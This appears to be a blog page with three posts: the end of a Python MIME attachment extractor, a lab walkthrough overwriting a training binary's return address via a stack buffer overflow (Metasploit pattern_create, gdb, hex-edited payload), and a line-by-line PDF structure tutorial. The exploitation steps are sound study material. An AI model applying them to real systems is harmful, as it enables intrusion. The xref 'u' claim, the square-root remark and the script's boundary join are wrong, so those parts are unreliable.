    Note: the outputFile will only be written for one file. If there are
    multiple message then outputFile will append counts before the file
    extension (if a file extension exists)
    '''
    import re
    import base64

    emailFile = open(emailMessageFile,'r')
    line = ""
    #Read lines until the first content-type is shown.
    while "Content-Type:" not in line:
        line=emailFile.readline()

    #get the boundary string
    match = re.search("boundary=(\S*)",line)
    boundary = match.group(1)

    #now that we have the boundary find the attachments
    count=0
    while line != "":
        line=emailFile.readline()
        if "Content-Type: application" in line:
            processApplicationSection(line, emailFile,outputFile,boundary,count)
            count+=1



def processApplicationSection(line, emailFile, outputFile, boundary,count):
    '''
    Reads a Content-Type: application section of a MIME message and
    determines the filename moves emailFile to the data
    '''
    import re
    import random
    makeFileName = outputFile == None
    while "--".join(boundary) not in line:
        #Get the name of the file to write
        if makeFileName:
            matchFilename = re.search('filename=(\S*)',line)
            if matchFilename != None:
                outputFile = matchFilename.group(1)
            matchFilename = re.search('filename=\"(.*)\"',line)
            if matchFilename != None:
                outputFile = matchFilename.group(1)
        else:
            if "." in outputFile:
                m = re.search("(.*)(\..*)",outputFile)
                filename = m.group(1)
                ext = m.group(2)
            else:
                filename = outputFile
                ext = ""
            outputFile = filename+str(count)+ext


        if line == "\n":
            if outputFile == None:
                outputFile = ''.join(random.sample('0123456789abcdefg',10))
            processRawData(emailFile, outputFile, boundary)
            return

        line = emailFile.readline()


def processRawData(emailFile, outputFile, boundary):
    import base64
    rawfile = open(outputFile,'wb')
    while(True):
        line = emailFile.readline()
        if "--"+boundary in line:
            break
        if line == "":
            break
        raw = line.strip()
        try:
            rawfile.write(base64.decodestring(raw))
        except:
            print "Incorrect Padding: "+ line
            raise

    print "wrote file: " + outputFile
    rawfile.close()


if __name__ == "__main__":
    if len(sys.argv) > 1:
        emailFile = sys.argv[1]
        outputFile = sys.argv[2] if len(sys.argv) > 2 else None
        processMIME(emailFile,outputFile)
    else:
        print "emailextract.py emailIn fileOut(opt)"
        print "fileIn should be the plain text original MIME encoded email"

In an exercise I came across today, I needed to overwrite the return address of the main function with the address of a different function. Here is one way to do this.

1. Using grep and objdump, find the address of the function I want to call.

>objdump -d program | grep functionname
080483f4 <functionname>:

2. Use metasploit's pattern_create function to create a unique string of length 120 and pipe into a file.

>~/metasploit/msf3/tools/pattern_create.rb 120 > ~/msfout

3. Use the pattern to find which value overrides EIP.

If you are using stdin, that is, you have to provide input after you start the program, you can use '<' to help you out.

>gdb stack4 -quiet
Reading symbols from /opt/bin/stack4...done.
(gdb) run < /home/user/msfout
Starting program: /opt/bin/stack4 < /home/user/msfout

Program received signal SIGSEGV, Segmentation fault.
0x63413563 in ?? ()

The last line shows the value of our EIP register. So EIP is 0x63413563. A quick piece of python to see the value of those bytes:

>>> b = '63413563'
>>> for i in range(0,len(b),2):
    print chr(int(b[i:i+2],16))
c
A
5
c

Of course, this is little endian-ness so, we are looking in our pattern for c5Ac.

4.Transform the pattern into a hex file so that we can get the address we want

>xxd ~/msfout ~/msfout.hex

Then edit the output in vim using a search (/) for c5Ac (space added for emphasis):

0000000: 4161 3041 6131 4161 3241 6133 4161 3441  Aa0Aa1Aa2Aa3Aa4A
0000010: 6135 4161 3641 6137 4161 3841 6139 4162  a5Aa6Aa7Aa8Aa9Ab
0000020: 3041 6231 4162 3241 6233 4162 3441 6235  0Ab1Ab2Ab3Ab4Ab5
0000030: 4162 3641 6237 4162 3841 6239 4163 3041  Ab6Ab7Ab8Ab9Ac0A
0000040: 6331 4163 3241 6333 4163 3441 6335 4163  c1Ac2Ac3Ac4A c5Ac
0000050: 3641 6337 4163 3841 6339 4164 3041 6431  6Ac7Ac8Ac9Ad0Ad1
0000060: 4164 3241 6433 4164 3441 6435 4164 3641  Ad2Ad3Ad4Ad5Ad6A
0000070: 6437 4164 3841 6439 0a                   d7Ad8Ad9.

Replace the hex (not the ASCII representation) with the value we want, and cut out the excess:

0000000: 4161 3041 6131 4161 3241 6133 4161 3441  Aa0Aa1Aa2Aa3Aa4A
0000010: 6135 4161 3641 6137 4161 3841 6139 4162  a5Aa6Aa7Aa8Aa9Ab
0000020: 3041 6231 4162 3241 6233 4162 3441 6235  0Ab1Ab2Ab3Ab4Ab5
0000030: 4162 3641 6237 4162 3841 6239 4163 3041  Ab6Ab7Ab8Ab9Ac0A
0000040: 6331 4163 3241 6333 4163 3441 f483 0408  c1Ac2Ac3Ac4Ac5Ac

5. Now, run with the new pattern.

> xxd -r ~/msfout.hex | ./stack4
code flow successfully changed
Segmentation fault
>

And there we have it. The segfault is expected, of course, because we ended up destroying the stack.

This post contains a line by line analysis of the structure of a sample PDF. I wrote it so that I could gain a better understanding of the PDF document. The example PDF is taken from a simpler explanation by Didier Stevens. The rest of the details are filled in by the Adobe PDF Specification. I must admit that much of this post is a gross plagiarism of the PDF Specification and I would describe it merely as a structural change so that a PDF can be explained line by line. There are a lot of topics concerning PDFs which I don't explain or reference because I intended this post only to explain this specific PDF and not all PDFs in general. I have two forms of the PDF available. They are the exact same file with different extensions. There is the PDF Version and the TXT Version. You should be able to edit these files with a basic text editor such as notepad. The PDF is delicate and relies heavily on byte-offsets, so you should be sure to check the values in your cross-reference table and trailer if you decide to edit the file.

The file structure of a PDF is made up of 4 distinct elements:

• A one-line header identifying the version of the PDF and the PDF Magic Number
• A body containing the hierarchical objects that make up the document contained in the file.
• A cross-reference table which gives the address about the objects in the file
• A trailer giving the location of the cross reference table.

The body is a list of sequential indirect objects and is hierarchical. That is, the objects in the body point to other objects, making a tree-like structure. The root of this tree is called the Document Catalog and it contains references to other important objects throughout the document. An example image from the PDF Specification is shown:

An example of a PDF is given below.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81

%PDF-1.7

1 0 obj
<<
 /Type /Catalog
 /Outlines 2 0 R
 /Pages 3 0 R
>>
endobj

2 0 obj
<<
 /Type /Outlines
 /Count 0
>>
endobj

3 0 obj
<<
 /Type /Pages
 /Kids [4 0 R]
 /Count 1
>>
endobj

4 0 obj
<<
 /Type /Page
 /Parent 3 0 R
 /MediaBox [0 0 612 792]
 /Contents 5 0 R
 /Resources
 << /ProcSet 6 0 R
    /Font << /F1 7 0 R >>
 >>
>>
endobj

5 0 obj
<< /Length 48 >>
stream
BT
/F1 24 Tf
100 700 Td
(Hello World)Tj
ET
endstream
endobj

6 0 obj
[/PDF /Text]
endobj

7 0 obj
<<
 /Type /Font
 /Subtype /Type1
 /Name /F1
 /BaseFont /Helvetica
 /Encoding /MacRomanEncoding
>>
endobj

xref
0 8
0000000000 65535 f
0000000012 00000 n
0000000089 00000 n
0000000145 00000 n
0000000214 00000 n
0000000381 00000 n
0000000485 00000 n
0000000518 00000 n
trailer
<<
 /Size 8
 /Root 1 0 R
>>
startxref
642
%%EOF

Lets break the PDF down into sections and explain them a little bit more.

%PDF-1.7

This is the one line header section and all it does is declare the file as a PDF file of version 1.7.

Next we have the body of the PDF document. The body is a sequence of objects that make up the document. There are 8 types of objects and each one listed in the body is an indirect object. An indirect object is a labelled object, so that it may be called by other objects. The body of the PDF document is made up of dictionary objects. A dictionary object is an associative table containing pairs of objects (known as entries) represented by a key and a value. The key must be a name and the value may be of any kind (including another dictionary). The keys in a single dictionary must be unique. A dictionary is written as a sequence of key-value pairs enclosed in double angle brackets (<<) and (>>).

Lets take a look at the first object in our file:

3
4
5
6
7
8
9

1 0 obj
<<
 /Type /Catalog
 /Outlines 2 0 R
 /Pages 3 0 R
>>
endobj

Line 3 declares the indirect object and 9 ends it. An indirect object is defined as

X Y obj
ExampleObject
endobj

• X is referred to as the object number
• Y is referred to as the generation number. The generation number refers to the generation (version) of the PDF document as PDF documents may be incrementally updated.

Inside the object declaration is the dictionary itself.

• Lines 4 and 8 start and end the dictionary.
• Line 5 describes the type of the dictionary object.

We see that the type is a Catalog type. This is a special (required) type and is the root of the document. The catalog contains references to other objects defining the document's contents, outlines, and other attributes. A Catalog dictionary contains two required entires:

• Type always has a value of Catalog (by definition).
• Pages points to the object that is the root of the page tree. The page tree contains references to each page, and each page contains references to the content that makes up that page such as strings and images (see image above).

Outlines, an optional entry, references the root of the outline hierarchy. The document outline consists of a tree-structured hierarchy of outline items (sometimes called bookmarks), which serve as a visual table of contents to display the documents structure to the user. Since Outlines and Pages both reference indirect objects, we can see how they are described. The value 2 0 R refers to an indirect object. This is called an indirect reference. The indirect reference consists of the object number, the generation number and the character R.

Lets look at the next object:

11
12
13
14
15
16

2 0 obj
<<
 /Type /Outlines
 /Count 0
>>
endobj

This describes the document outline object. We see that this object has object number 2 and generation number 0. In addition the dictionary is described as the Outlines type. Count describes the total number of visible outline items at all levels of the outline.

Next we have object 3 which contains the dictionary for Pages, known as the Page Tree.

18
19
20
21
22
23
24

3 0 obj
<<
 /Type /Pages
 /Kids [4 0 R]
 /Count 1
>>
endobj

Page tree nodes are made up of the following:

• Type - (Required) which is always Pages for a page tree node.
• Parent - (Required - but it is prohibited in the root node) The page tree node that is the immediate parent of this one. We can tell that 3 is the root page tree node because it does not list a Parent entry.
• Kids - (Required) An array of indirect references to the immediate children of this node. In this case the node has 1 Kid and it is object 4.
• Count - (Required) The number of leaf nodes (page objects) that are descendants of this node within the page tree

This brings us to the page object. The source for our one page object is:

26
27
28
29
30
31
32
33
34
35
36
37

4 0 obj
<<
 /Type /Page
 /Parent 3 0 R
 /MediaBox [0 0 612 792]
 /Contents 5 0 R
 /Resources
 << /ProcSet 6 0 R
    /Font << /F1 7 0 R >>
 >>
>>
endobj

The page object is a dictionary specifying the attributes of a single page of the document. Lets discus the entries which have not been described previously.

• MediaBox - (Required, inheritable) - Includes a Rectangle Object which describes "bounding boxes" for the object.
• Contents (Optional) - A content stream that describe the contents of this page.
• Resources(Required, inheritable) - A dictionary containing any resources required by the page. Here we have two entries in resources:
• ProcSet - References the object that describes the procedure sets
• Font - A dictionary that maps resource names to font dictionaries. In this case a font named F1 located in object 7.

Next we have object 5, which contains the content stream of our page.

39
40
41
42
43
44
45
46
47
48

5 0 obj
<< /Length 48 >>
stream
BT
/F1 24 Tf
100 700 Td
(Hello World)Tj
ET
endstream
endobj

The dictionary in this object describes only the length of the stream.

Next we see how the text is shown. It should be noted that the Text uses operators and operands. The operand (the object that is acted on) precedes the operator. In mathematics, we see this with the square root operator. If 5^2 is written, we know that 5 (the operand) is to be squared (the operator).

• On lines 41 and 47 we see the declaration for starting and ending the stream.
• Line 42 and 46 (BT and ET) begin and end the text object.
• Line 43 specifies the font and font size to use (the operand). Tf is the operator and specifies the name of the font resource, that is, an entry in the Font subdictionary of the current resource dictionary.
• Line 44 specifies the starting position for the text on the page. Td is a text-positioning operator, and helps determine the location of the text.
• Line 45 contains the String, enclosed in parentheses, to be displayed.Tj takes a string operand and paints it using the font and other text related parameters.

Next we look at object 6.

50
51
52

6 0 obj
[/PDF /Text]
endobj

We remember that this object was referenced by object 4 (the page node) in the resource dictionary under the ProcSet key. The PDF operators used in content streams are grouped into categories of related operators called Procedure Sets. This object holds an array (declared by the right and left brackets [ ]) of two procedure sets called PDF and Text. It should be noted that as of PDF version 1.4 this information is not used by the reader, but is still generated so that older readers may work.

The final object is object 7, shown below.

54
55
56
57
58
59
60
61
62

7 0 obj
<<
 /Type /Font
 /Subtype /Type1
 /Name /F1
 /BaseFont /Helvetica
 /Encoding /MacRomanEncoding
>>
endobj

Object 7 was also referenced by object 4 (the page node) in the resources dictionary as the value to the Font key. The entries listed in this object are straightforward, and notice that the name /F1 is the same one referenced throughout the document.

This brings us to the cross-reference table. The cross-reference table lists the information that permits access to indirect objects within the file. Listing the file in this way allows a reader to read parts of the file before reading the entire thing (know as Random Access). The cross-reference table is shown below.

64
65
66
67
68
69
70
71
72
73

xref
0 8
0000000000 65535 f
0000000012 00000 n
0000000089 00000 n
0000000145 00000 n
0000000214 00000 n
0000000381 00000 n
0000000485 00000 n
0000000518 00000 n

Line 64 declares the start of the cross-reference table. The next line introduces the cross-reference subsection. For a file that has never been incrementally updated (such as this one), there will be only one cross-reference subsection. Each cross-reference subsection contains entries for a contiguous range of object numbers. The subsection begins with a line containing two numbers. The first (0 in our case) is the object number of the first object and the second (8) contains the number of objects in that subsection. Lines 66 through 73 contain the cross-reference entries themselves, one per line. Lines are constructed as followes:

• If an entry is free ..- The entry should end with an f ..- The first group of 10 numbers should be the (0 padded) object number of the next free object ..- The group of 5 numbers should be the 5-digit generation number
• If an entry is in use ..- The entry should end with a u ..- The first group of 10 numbers should be the (0 padded) byte offset in the stream ..- The group of 5 numbers should be the 5-digit generation number

The first entry in the table will always be free and shall have a generation number of 65,535. If it is the only free object (as in our case), it will have 0000000000 (itself) as the listing to the next free object.

Finally, the PDF file ends with the file trailer. The file trailer links to the cross-reference table and other special objects.

74
75
76
77
78
79
80
81

trailer
<<
 /Size 8
 /Root 1 0 R
>>
startxref
642
%%EOF

The trailer is declared by the word trailer. Next we see the trailer dictionary:. -Size - Contains the total number of entries in the files cross-reference table -Root - Contains the indirect reference to the root (catalog dictionary) of the document. After the trailer dictionary is the startxref keyword, which gives the byte-offset to the xref keyword. Finally, %%EOF declares the end of the PDF document.